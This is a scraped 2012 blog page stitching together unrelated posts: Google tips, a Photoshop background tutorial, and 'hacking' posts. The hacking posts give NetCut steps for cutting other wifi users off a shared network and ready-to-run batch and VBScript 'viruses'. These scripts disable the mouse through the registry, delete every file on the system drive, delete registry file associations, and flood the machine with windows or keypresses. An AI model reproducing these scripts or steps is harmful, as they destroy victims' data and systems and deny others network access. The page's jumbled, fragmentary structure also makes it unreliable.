Thursday 31 May 2012

Some Amazing Things You Can Do With Google



The Days Are Gone When Google Was Used  As An Search Engine 

Only. In Recent Years Google Has Become Faster, Smarter And 

Powerful Than Ever. Apart Of ‘Googling’ Keywords, You Junkies 

Can Actually Do A Lot Of Productive Work On It. In This Article, 

We Will Be Exploring The ‘Art Of Googling’  Which Can Help You 

Junkies Carry Out Your Day To Day Task With Ease.





1. Carry Out Arithmetic And Logical Equations





Google’s Clever Algorithms Lets You Carry Out Arithmetic 

And Logical Equation Solving In A Snap. 





Monday 5 March 2012

Hack Internet Connection Of Wifi Users

Hack Internet Connection Of Wifi Users



Guys, we have noticed that whenever we use the internet connection on shared server like wifi in our college or WLAN in office, the speed we got is too slow somewhere and it really irritate. This is because of the more crowd on the server than its capacity.  So there's a trick to increase the speed by blocking others internet connection on that server.
                           

 lets start to increase the speed.


 Step 1-   First of all download a software named netcut. 
 
Step 2- Goto this link http://www.filecluster.com/downloads/NetCut.html
               from there you will get it and install it on your system.
 Step 3- Now open the netcut. and you will be able to see all the internet users on that server. You can also identify any user by his/her ip address and physical address shown there.
 Step 4- Now select the user or users you want to cutoff from the internet. Then click on
 cutoff  option like shown in pic.


 Step 5- After blocking some of the users you will notice that the internet speed on your system  will be increase.
 Step 6- You can unblock the users by selecting the
 resumebutton.
ENJOY HACKING -) 

Make a virus that disable Mouse

Make a virus that disable Mouse






We will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.

  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.

COMMAND PROMPT TRICK

COMMAND PROMPT TRICK





The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again


CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00




-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer


CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10


-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)


CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE


-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*

CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
CODE
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
CODE
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


-Endless Backspace
*This makes it so the backspace key is constantly being pressed*
CODE
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


-Popping CD Drives
*This will make the CD drives constantly pop out*
CODE
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

Change & add new background to image in photoshop

Change & add new background to image in photoshop



Changing background of any image can give radical makeover and make image look more attractive. It is important to select right kind of image for usage as background for specific images. This involves working with image layers and editing each layer for required changes (dont worry, its easy!).
Change Image background
1. Morph background and foreground images, Read this tutorial first
2. Drag to bring background image layer on top of other image.


Twitter Bird Gadget